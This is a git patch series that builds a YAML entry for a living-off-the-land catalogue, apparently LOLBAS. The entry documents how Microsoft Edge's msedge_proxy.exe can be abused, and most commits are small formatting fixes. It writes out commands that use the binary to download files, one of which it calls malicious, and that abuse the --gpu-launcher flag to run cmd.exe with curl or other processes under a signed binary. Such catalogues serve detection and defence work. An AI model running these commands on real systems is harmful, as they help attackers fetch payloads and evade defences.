From b14ad21ff91e19b8dd63dd7ec157ee068e729d1c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Fri, 18 Aug 2023 17:17:49 +0300 Subject: [PATCH 01/17] Create msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 yml/OSBinaries/msedge_proxy.yml diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml new file mode 100644 index 0000000..dfe5567 --- /dev/null +++ b/yml/OSBinaries/msedge_proxy.yml @@ -0,0 +1,29 @@ +Name: msedge_proxy.exe +Description: Microsoft Edge Browser +Author: Mert Daş +Created: 2023-08-18 +Commands: + - Command: msedge_proxy.exe http://example.com/test.zip + Description: msedge_proxy will download malicious file. + Usecase: Download file from the internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" + Description: Edge will silently download the file. + Usecase: Download file from the internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" + Description: msedge_proxy.exe will execute file in the background + Usecase: Executes a process under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10, Windows 11 +Acknowledgement: + - Person: Mert Daş + Handle: '@merterpreter' From 68629128a3fc54db5f151909c62740d7a8930ebf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Fri, 18 Aug 2023 17:44:23 +0300 Subject: [PATCH 02/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index dfe5567..50121bf 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,3 +1,4 @@ +--- Name: msedge_proxy.exe Description: Microsoft Edge Browser Author: Mert Daş From f4acc019063d85705efebeefb4eebe33d7d1f3c6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Fri, 18 Aug 2023 17:47:17 +0300 Subject: [PATCH 03/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 50121bf..3658060 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,7 +1,7 @@ --- Name: msedge_proxy.exe Description: Microsoft Edge Browser -Author: Mert Daş +Author: 'Mert Daş' Created: 2023-08-18 Commands: - Command: msedge_proxy.exe http://example.com/test.zip From 0f3b483ae16bc0dee8f662118aedc5ac50116a6d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Fri, 25 Aug 2023 21:23:41 +0300 Subject: [PATCH 04/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 3658060..1bbf15c 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,6 +1,6 @@ --- Name: msedge_proxy.exe -Description: Microsoft Edge Browser +Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: @@ -12,7 +12,7 @@ Commands: MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" - Description: Edge will silently download the file. + Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download Privileges: User From 9d79fab2305c75820a3235d3286a1896cc75c880 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Fri, 25 Aug 2023 21:24:58 +0300 Subject: [PATCH 05/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 1bbf15c..f237f9b 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,6 +1,6 @@ --- Name: msedge_proxy.exe -Description: Microsoft Edge Browser +Description: Microsoft edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: From 53f8fbe19b27e90509e6f3fb01b17c35b95e9c25 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 21:44:41 +0300 Subject: [PATCH 06/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index f237f9b..ff073e1 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -11,14 +11,14 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" + - Command: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" + - Command: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" Description: msedge_proxy.exe will execute file in the background Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute From a0874f2bb73bcfe27b2cd657e413e40c9d785a01 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 21:48:05 +0300 Subject: [PATCH 07/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index ff073e1..95a0e80 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" + - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\Windows\System32\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&" Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download From 247511bca85446726c0dce774e3c2aee31586d1c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 21:51:32 +0300 Subject: [PATCH 08/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 95a0e80..c347c19 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -18,7 +18,7 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" + - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" Description: msedge_proxy.exe will execute file in the background Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute From 994aa792f0beebf81bee641ec197fad774538c7f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 22:11:01 +0300 Subject: [PATCH 09/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index c347c19..10af862 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -4,7 +4,7 @@ Description: Microsoft edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: - - Command: msedge_proxy.exe http://example.com/test.zip + - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" http://example.com/test.zip Description: msedge_proxy will download malicious file. Usecase: Download file from the internet Category: Download From f8743a4109644bf4801a299b0547bf3dee2b7285 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 22:17:14 +0300 Subject: [PATCH 10/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 10af862..453d30f 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -4,21 +4,21 @@ Description: Microsoft edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: - - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" http://example.com/test.zip + - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" http://example.com/test.zip Description: msedge_proxy will download malicious file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\Windows\System32\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&" + - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\\Windows\\System32\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&" Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" + - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\system32\\cmd.exe /c ping google.com &&" Description: msedge_proxy.exe will execute file in the background Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute From d5f153b84bc445c94e16db0af5864ede1afcae93 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 22:23:40 +0300 Subject: [PATCH 11/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 453d30f..0a67972 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,26 +1,26 @@ --- Name: msedge_proxy.exe -Description: Microsoft edge Browser +Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: - - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" http://example.com/test.zip + - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe http://example.com/test.zip" Description: msedge_proxy will download malicious file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\\Windows\\System32\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&" + - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\\\\Desktop\\\\test.json &&\"" Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\system32\\cmd.exe /c ping google.com &&" + - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c ping google.com &&\"" Description: msedge_proxy.exe will execute file in the background - Usecase: Executes a process under a trusted Microsoft signed binary + Usecase: Executes a process under a trusted Microsoft-signed binary Category: Execute Privileges: User MitreID: T1218 From e2c58fcf31e0b24309baaa89d47bb406c4a72665 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 22:28:00 +0300 Subject: [PATCH 12/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 0a67972..ac498ff 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -20,7 +20,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c ping google.com &&\"" Description: msedge_proxy.exe will execute file in the background - Usecase: Executes a process under a trusted Microsoft-signed binary + Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1218 From 7da6f3216dc5438035c8eb6b604d038c1ab3d010 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Tue, 5 Sep 2023 18:37:14 +0300 Subject: [PATCH 13/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index ac498ff..cab7496 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,5 +1,5 @@ ---- Name: msedge_proxy.exe +Full_Path: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 From fee20a08130f420d8dd17514b8efc2bedc94b73b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Tue, 5 Sep 2023 18:39:16 +0300 Subject: [PATCH 14/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index cab7496..ea7bd62 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,3 +1,4 @@ +--- Name: msedge_proxy.exe Full_Path: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" Description: Microsoft Edge Browser From 69976b4880d1b7fe9dc00c19c15578d49e168b75 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Tue, 5 Sep 2023 18:41:36 +0300 Subject: [PATCH 15/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index ea7bd62..fb75715 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -1,7 +1,7 @@ --- Name: msedge_proxy.exe -Full_Path: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" -Description: Microsoft Edge Browser +Full_Path: + - Path: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe Author: 'Mert Daş' Created: 2023-08-18 Commands: From e585183dcd7a6b9e90c87539105f71cc6d854fb3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Tue, 5 Sep 2023 18:45:00 +0300 Subject: [PATCH 16/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index fb75715..9aeb5a0 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -2,6 +2,7 @@ Name: msedge_proxy.exe Full_Path: - Path: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe +Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: From e75e99f1cfe148aa8bcf82a5a52dd3d38a80f914 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Tue, 5 Sep 2023 18:47:05 +0300 Subject: [PATCH 17/17] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index 9aeb5a0..3c0c04e 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -2,7 +2,7 @@ Name: msedge_proxy.exe Full_Path: - Path: C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe -Description: Microsoft Edge Browser +Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: